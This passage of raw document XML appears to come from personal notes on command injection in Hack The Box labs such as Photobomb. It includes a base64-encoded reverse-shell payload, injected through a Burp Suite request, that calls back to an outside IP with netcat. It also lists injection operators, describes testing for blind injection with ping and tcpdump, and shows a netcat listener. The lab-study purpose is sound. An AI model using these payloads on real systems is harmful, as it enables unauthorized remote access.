    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="72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0DC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit the burpsuite request to run the ping command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pinger=127.0.0.1+|echo+-n+"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ1LjIwOCA0NDMgPi90bXAvZg=="+|+base64+-d+|bash&amp;submitt=Submit+Querypinger=127.0.0.1+|echo+-n+"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ1LjIwOCA0NDMgPi90bXAvZg=="+|+base64+-d+|bash&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">submitt=Submit+Query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "submitt=Submit+Query" is just the second argument. It's specific to this website, so no worries if your website doesn't have it if you are doing another box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_116r9vjqd43x" w:id="121"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other command injections to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; id → semicolon runs id no matter what.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; id → runs id only if ping succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 || id → runs id only if ping fails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 $(id) → runs id and inserts its output as part of the command.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o81p9eb4bd7" w:id="122"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(BLIND) Command Injection for downloading photos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the Photobomb easy HTB, when downloading photos, we see three parameters in the Burpsuite request: photo, filetype, dimensions. We can try command injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD2">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="582" name="image480.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image480.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2019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D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, send the request to the Repeater Tab so we can try things easier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we attempt to test for a command injection vulnerability by entering a semi-colon (which is a delimiter for commands in Bash as well as most scripting languages) into each field, followed by the command id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application does not return any useful output within the HTTP response, so a different technique is required for testing. Doesn't mean that the commands aren't vulnerable, it just means that it doesn't show any output so maybe it involves </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blind command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we don't see any visible output of confirmation!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="417" name="image86.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image86.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId293"/>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DD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -ni tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to edit the command that we are attempting to inject to a ping command, which if successful will send ICMP packets to the specified address. To capture such packets, we set up a tcpdump for all ICMP traffic on the tun0 interface of our local machine, which is by default used by our lab VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDB">
      <w:pPr>
        <w:ind w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="454" name="image146.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image146.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1943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DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also make sure to account for the spaces and any other special characters in our payload by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command by selecting it and pressing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the BurpSuite repeater, so as to ensure the application properly processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command (before URL-encoding) is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" limits the number of ping requests to 3. Default runs it indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your HOST IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We attempt pasting our payload into all three of the parameters, one at a time, until we see the packets on our tcpdump. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows us to check which parameter is vulnerable to command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="165" name="image172.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image172.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29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DE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get the ICMP packets for the filetype parameter!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful blind command injection!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use this command injection to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to set up a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We proceed to try out different </w:t>
      </w:r>
      <w:hyperlink r:id="rId296">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">payloads </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">until one gives us a callback to our listener. After some testing, we try out a Python3 payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
